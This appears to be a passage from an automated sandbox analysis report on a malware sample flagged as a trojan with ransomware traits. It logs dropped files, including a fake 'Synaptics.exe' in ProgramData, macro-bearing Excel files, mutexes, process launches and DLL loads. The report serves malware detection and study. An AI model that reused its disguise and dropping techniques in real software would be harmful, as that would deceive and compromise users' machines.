Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS4655FB.tmp
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS4655FB.tmp\Apr2006_xact_x64.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\SysWOW64\DirectX\WebSetup\Apr2006_xact_x64.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS465B98.tmp
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS465B98.tmp\Jun2006_xact_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\SysWOW64\DirectX\WebSetup\Jun2006_xact_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS466117.tmp
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS466117.tmp\Jun2006_xact_x64.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\SysWOW64\DirectX\WebSetup\Jun2006_xact_x64.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS466702.tmp
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS466702.tmp\Aug2006_xact_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\SysWOW64\DirectX\WebSetup\Aug2006_xact_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS466CA0.tmp
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS466CA0.tmp\Aug2006_xact_x64.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\SysWOW64\DirectX\WebSetup\Aug2006_xact_x64.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS46728B.tmp
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS46728B.tmp\Oct2006_d3dx9_31_x64.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\SysWOW64\DirectX\WebSetup\Oct2006_d3dx9_31_x64.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS467BE2.tmp
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS467BE2.tmp\Oct2006_xact_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\SysWOW64\DirectX\WebSetup\Oct2006_xact_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS4681BE.tmp
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS4681BE.tmp\Oct2006_xact_x64.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\SysWOW64\DirectX\WebSetup\Oct2006_xact_x64.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS46876B.tmp
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS46876B.tmp\Dec2006_d3dx9_32_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Dec2006_d3dx9_32_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS46911F.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS46911F.tmp\Dec2006_xact_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Dec2006_xact_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS4696FB.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS4696FB.tmp\Dec2006_xact_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Dec2006_xact_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS469D26.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS469D26.tmp\Feb2007_xact_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Feb2007_xact_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS46A2D3.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS46A2D3.tmp\Feb2007_xact_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Feb2007_xact_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS46A89F.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS46A89F.tmp\Apr2007_d3dx9_33_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Apr2007_d3dx9_33_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS46B273.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS46B273.tmp\Apr2007_d3dx10_33_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Apr2007_d3dx10_33_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS46B9B6.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS46B9B6.tmp\Apr2007_xact_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Apr2007_xact_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS46BF54.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS46BF54.tmp\Apr2007_xact_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Apr2007_xact_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS46C53F.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS46C53F.tmp\Jun2007_d3dx9_34_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Jun2007_d3dx9_34_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS46CF03.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS46CF03.tmp\Jun2007_d3dx10_34_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Jun2007_d3dx10_34_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS46D685.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS46D685.tmp\Jun2007_xact_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Jun2007_xact_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS46DD5B.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS46DD5B.tmp\Jun2007_xact_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Jun2007_xact_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS46E356.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS46E356.tmp\Aug2007_d3dx9_35_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile deleted: C:\Windows\SysWOW64\directx\websetup\SETFF3.tmpJump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exe | Code function: 2_2_01007E02
                          Source: C:\Users\user\Desktop\._cache_file.exe | Code function: 2_2_0100791E
                          Source: C:\Users\user\Desktop\._cache_file.exe | Code function: 2_2_0100878E
                          Source: C:\Users\user\Desktop\._cache_file.exe | Code function: 2_2_010080E2
                          Source: r4UZcR9I.xlsm.3.dr | OLE, VBA macro line: Private Sub Workbook_Open()
                          Source: r4UZcR9I.xlsm.3.dr | OLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                          Source: EOWRVPQCCS.xlsm.3.dr | OLE, VBA macro line: Private Sub Workbook_Open()
                          Source: EOWRVPQCCS.xlsm.3.dr | OLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                          Source: Joe Sandbox View | Dropped File: C:\ProgramData\Synaptics\RCXE9B.tmp 1316730BBC50851C02F53254F9C57B99AF50A07BB0776332D1480BABD626F39A
                          Source: file.exe | Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, MS CAB-Installer self-extracting archive
                          Source: file.exe | Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, MS CAB-Installer self-extracting archive
                          Source: file.exe | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Source: ._cache_file.exe.0.dr | Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 220645 bytes, 5 files, at 0x2c "dsetup.dll" "dsetup32.dll", ID 5930, number 1, 75 datablocks, 0x1503 compression
                          Source: Synaptics.exe.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, MS CAB-Installer self-extracting archive
                          Source: Synaptics.exe.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, MS CAB-Installer self-extracting archive
                          Source: Synaptics.exe.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Source: RCXE9B.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Source: dxwsetup.exe.2.dr | Static PE information: Resource name: RT_VERSION type: TTComp archive data, binary, 4K dictionary
                          Source: dxwsetup.exe.2.dr | Static PE information: Resource name: RT_VERSION type: TTComp archive data, binary, 4K dictionary
                          Source: dxwsetup.exe.2.dr | Static PE information: Resource name: RT_VERSION type: TTComp archive data, binary, 4K dictionary
                          Source: ~$cache1.3.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Source: dxwsetup.exe.2.dr | Static PE information: Resource name: RT_VERSION type: TTComp archive data, binary, 4K dictionary
                          Source: dxwsetup.exe.2.dr | Static PE information: Resource name: RT_VERSION type: TTComp archive data, binary, 4K dictionary
                          Source: dxwsetup.exe.2.dr | Static PE information: Resource name: RT_VERSION type: TTComp archive data, binary, 4K dictionary
                          Source: file.exe, 00000000.00000000.2035117785.0000000000401000.00000020.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFileName vs file.exe
                          Source: file.exe, 00000000.00000003.2043741217.0000000002490000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameb! vs file.exe
                          Source: file.exe, 00000000.00000003.2041569981.0000000004641000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamedxwebsetup.exej% vs file.exe
                          Source: file.exe, 00000000.00000003.2043794889.0000000000798000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFileName vs file.exe
                          Source: file.exe, 00000000.00000000.2035201683.00000000004A5000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamedxwebsetup.exej% vs file.exe
                          Source: file.exe, 00000000.00000000.2035201683.00000000004A5000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameb! vs file.exe
                          Source: ._cache_file.exe, 00000002.00000003.2043009368.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamedxwsetup.exeh$ vs file.exe
                          Source: ._cache_file.exe, 00000002.00000003.2043009368.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamedxwsetup.exe` vs file.exe
                          Source: ._cache_file.exe, 00000002.00000003.2043009368.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamedxwsetup.exed! vs file.exe
                          Source: ._cache_file.exe, 00000002.00000003.2043009368.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamedxwsetup.exel% vs file.exe
                          Source: ._cache_file.exe, 00000002.00000003.2043009368.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamedxwsetup.exep( vs file.exe
                          Source: ._cache_file.exe, 00000002.00000003.2043009368.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamedsetup32.dllh$ vs file.exe
                          Source: ._cache_file.exe, 00000002.00000003.2043009368.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamedsetup32.dll` vs file.exe
                          Source: ._cache_file.exe, 00000002.00000003.2043009368.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamedsetup32.dlld! vs file.exe
                          Source: ._cache_file.exe, 00000002.00000003.2043009368.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamedsetup32.dllp' vs file.exe
                          Source: ._cache_file.exe, 00000002.00000003.2043009368.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamedsetup32.dllx, vs file.exe
                          Source: file.exe | Binary or memory string: OriginalFileName vs file.exe
                          Source: file.exe | Binary or memory string: OriginalFilenamedxwebsetup.exej% vs file.exe
                          Source: file.exe | Binary or memory string: OriginalFilenameb! vs file.exe
                          Source: ._cache_file.exe.0.dr | Binary or memory string: OriginalFilenamedxwebsetup.exej% vs file.exe
                          Source: file.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                          Source: classification engine | Classification label: mal74.rans.troj.expl.winEXE@11/258@4/3
                          Source: C:\Users\user\Desktop\._cache_file.exe | Code function: 2_2_01003F0D lstrcpyA,GetCurrentDirectoryA,SetCurrentDirectoryA,SetCurrentDirectoryA,GetLastError,FormatMessageA,GetVolumeInformationA,GetLastError,FormatMessageA,SetCurrentDirectoryA,SetCurrentDirectoryA,lstrcpynA
                          Source: C:\Users\user\Desktop\._cache_file.exe | Code function: 2_2_010018B5 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx
                          Source: C:\Users\user\Desktop\._cache_file.exe | Code function: 2_2_01005E67 GetDiskFreeSpaceA,SetCurrentDirectoryA,MulDiv
                          Source: C:\Users\user\Desktop\._cache_file.exe | Code function: 2_2_01004C18 CreateEventA,SetEvent,CreateMutexA,GetLastError,CloseHandle,FindResourceA,LoadResource,#17
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xml
                          Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\Desktop\._cache_file.exe
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | Mutant created: \Sessions\1\BaseNamedObjects\DSETUP32 DLL Mutex
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | Mutant created: \Sessions\1\BaseNamedObjects\DXWSETUP
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | Mutant created: \Sessions\1\BaseNamedObjects\DXUPDATE DLL Mutex
                          Source: C:\ProgramData\Synaptics\Synaptics.exe | Mutant created: \Sessions\1\BaseNamedObjects\Synaptics2X
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | Mutant created: \Sessions\1\BaseNamedObjects\DSETUP DLL Mutex
                          Source: C:\Users\user\Desktop\._cache_file.exe | File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP
                          Source: Yara match | File source: file.exe, type: SAMPLE
                          Source: Yara match | File source: 0.0.file.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 00000000.00000000.2035117785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara match | File source: C:\ProgramData\Synaptics\RCXE9B.tmp, type: DROPPED
                          Source: Yara match | File source: C:\Users\user\Documents\BJZFPPWAPT\~$cache1, type: DROPPED
                          Source: Yara match | File source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                          Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                          Source: C:\ProgramData\Synaptics\Synaptics.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                          Source: C:\ProgramData\Synaptics\Synaptics.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                          Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\Desktop\desktop.ini
                          Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                          Source: file.exe | ReversingLabs: Detection: 92%
                          Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\Desktop\file.exe
                          Source: unknown | Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                          Source: C:\Users\user\Desktop\file.exe | Process created: C:\Users\user\Desktop\._cache_file.exe "C:\Users\user\Desktop\._cache_file.exe"
                          Source: C:\Users\user\Desktop\file.exe | Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                          Source: C:\Users\user\Desktop\._cache_file.exe | Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                          Source: unknown | Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                          Source: unknown | Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe"
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
                          Source: C:\Users\user\Desktop\file.exe | Process created: C:\Users\user\Desktop\._cache_file.exe "C:\Users\user\Desktop\._cache_file.exe"
                          Source: C:\Users\user\Desktop\file.exe | Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                          Source: C:\Users\user\Desktop\._cache_file.exe | Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
                          Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
                          Source: C:\Users\user\Desktop\file.exe | Section loaded: version.dll
                          Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
                          Source: C:\Users\user\Desktop\file.exe | Section loaded: wsock32.dll
                          Source: C:\Users\user\Desktop\file.exe | Section loaded: netapi32.dll
                          Source: C:\Users\user\Desktop\file.exe | Section loaded: uxtheme.dll
                          Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
                          Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
                          Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
                          Source: C:\Users\user\Desktop\file.exe | Section loaded: textshaping.dll
                          Source: C:\Users\user\Desktop\file.exe | Section loaded: propsys.dll
                          Source: C:\Users\user\Desktop\file.exe | Section loaded: twext.dll
                          Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.staterepositoryps.dll
                          Source: C:\Users\user\Desktop\file.exe | Section loaded: appresolver.dll
                          Source: C:\Users\user\Desktop\file.exe | Section loaded: bcp47langs.dll
                          Source: C:\Users\user\Desktop\file.exe | Section loaded: slc.dll
                          Source: C:\Users\user\Desktop\file.exe | Section loaded: userenv.dll
                          Source: C:\Users\user\Desktop\file.exe | Section loaded: sppc.dll
                          Source: C:\Users\user\Desktop\file.exe | Section loaded: policymanager.dll
                          Source: C:\Users\user\Desktop\file.exe | Section loaded: msvcp110_win.dll
                          Source: C:\Users\user\Desktop\file.exe | Section loaded: ntshrui.dll
                          Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
                          Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.fileexplorer.common.dll
                          Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
                          Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
                          Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
                          Source: C:\Users\user\Desktop\file.exe | Section loaded: cscapi.dll
                          Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
                          Source: C:\Users\user\Desktop\file.exe | Section loaded: shacct.dll
                          Source: C:\Users\user\Desktop\file.exe | Section loaded: twinapi.appcore.dll
                          Source: C:\Users\user\Desktop\file.exe | Section loaded: idstore.dll
                          Source: C:\Users\user\Desktop\file.exe | Section loaded: samlib.dll
                          Source: C:\Users\user\Desktop\file.exe | Section loaded: starttiledata.dll
                          Source: C:\Users\user\Desktop\file.exe | Section loaded: acppage.dll
                          Source: C:\Users\user\Desktop\file.exe | Section loaded: sfc.dll
                          Source: C:\Users\user\Desktop\file.exe | Section loaded: msi.dll
                          Source: C:\Users\user\Desktop\file.exe | Section loaded: aepic.dll
                          Source: C:\Users\user\Desktop\file.exe | Section loaded: sfc_os.dll
                          Source: C:\Users\user\Desktop\file.exe | Section loaded: ntmarta.dll
                          Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptsp.dll
                          Source: C:\Users\user\Desktop\file.exe | Section loaded: wlidprov.dll
                          Source: C:\Users\user\Desktop\file.exe | Section loaded: samcli.dll
                          Source: C:\Users\user\Desktop\file.exe | Section loaded: provsvc.dll
                          Source: C:\Users\user\Desktop\file.exe | Section loaded: edputil.dll
                          Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
                          Source: C:\Users\user\Desktop\file.exe | Section loaded: wintypes.dll
                          Source: C:\Users\user\Desktop\file.exe | Section loaded: onecorecommonproxystub.dll
                          Source: C:\Users\user\Desktop\file.exe | Section loaded: onecoreuapcommonproxystub.dll
                          Source: C:\Users\user\Desktop\file.exe | Section loaded: ntmarta.dll
                          Source: C:\Users\user\Desktop\file.exe | Section loaded: twext.dll
                          Source: C:\Users\user\Desktop\file.exe | Section loaded: ntshrui.dll
                          Source: C:\Users\user\Desktop\file.exe | Section loaded: starttiledata.dll
                          Source: C:\Users\user\Desktop\file.exe | Section loaded: acppage.dll
                          Source: C:\Users\user\Desktop\file.exe | Section loaded: sfc.dll
                          Source: C:\Users\user\Desktop\file.exe | Section loaded: msi.dll
                          Source: C:\Users\user\Desktop\file.exe | Section loaded: aepic.dll
                          Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptsp.dll
                          Source: C:\Users\user\Desktop\file.exe | Section loaded: sfc_os.dll
                          Source: C:\Users\user\Desktop\._cache_file.exe | Section loaded: apphelp.dll
                          Source: C:\Users\user\Desktop\._cache_file.exe | Section loaded: acgenral.dll
                          Source: C:\Users\user\Desktop\._cache_file.exe | Section loaded: uxtheme.dll
                          Source: C:\Users\user\Desktop\._cache_file.exe | Section loaded: winmm.dll
                          Source: C:\Users\user\Desktop\._cache_file.exe | Section loaded: samcli.dll
                          Source: C:\Users\user\Desktop\._cache_file.exe | Section loaded: msacm32.dll
                          Source: C:\Users\user\Desktop\._cache_file.exe | Section loaded: version.dll
                          Source: C:\Users\user\Desktop\._cache_file.exe | Section loaded: userenv.dll
                          Source: C:\Users\user\Desktop\._cache_file.exe | Section loaded: dwmapi.dll
                          Source: C:\Users\user\Desktop\._cache_file.exe | Section loaded: urlmon.dll
                          Source: C:\Users\user\Desktop\._cache_file.exe | Section loaded: mpr.dll
                          Source: C:\Users\user\Desktop\._cache_file.exe | Section loaded: sspicli.dll
                          Source: C:\Users\user\Desktop\._cache_file.exe | Section loaded: winmmbase.dll
                          Source: C:\Users\user\Desktop\._cache_file.exe | Section loaded: winmmbase.dll
                          Source: C:\Users\user\Desktop\._cache_file.exe | Section loaded: iertutil.dll
                          Source: C:\Users\user\Desktop\._cache_file.exe | Section loaded: srvcli.dll
                          Source: C:\Users\user\Desktop\._cache_file.exe | Section loaded: netutils.dll
                          Source: C:\Users\user\Desktop\._cache_file.exe | Section loaded: aclayers.dll
                          Source: C:\Users\user\Desktop\._cache_file.exe | Section loaded: sfc.dll
                          Source: C:\Users\user\Desktop\._cache_file.exe | Section loaded: sfc_os.dll
                          Source: C:\Users\user\Desktop\._cache_file.exe | Section loaded: advpack.dll
                          Source: C:\ProgramData\Synaptics\Synaptics.exe | Section loaded: apphelp.dll
                          Source: C:\ProgramData\Synaptics\Synaptics.exe | Section loaded: version.dll
                          Source: C:\ProgramData\Synaptics\Synaptics.exe | Section loaded: wininet.dll
                          Source: C:\ProgramData\Synaptics\Synaptics.exe | Section loaded: wsock32.dll
                          Source: C:\ProgramData\Synaptics\Synaptics.exe | Section loaded: netapi32.dll
                          Source: C:\ProgramData\Synaptics\Synaptics.exe | Section loaded: uxtheme.dll
                          Source: C:\ProgramData\Synaptics\Synaptics.exe | Section loaded: windows.storage.dll
                          Source: C:\ProgramData\Synaptics\Synaptics.exe | Section loaded: wldp.dll
                          Source: C:\ProgramData\Synaptics\Synaptics.exe | Section loaded: kernel.appcore.dll
                          Source: C:\ProgramData\Synaptics\Synaptics.exe | Section loaded: textshaping.dll
                          Source: C:\ProgramData\Synaptics\Synaptics.exe | Section loaded: profapi.dll
                          Source: C:\ProgramData\Synaptics\Synaptics.exe | Section loaded: propsys.dll
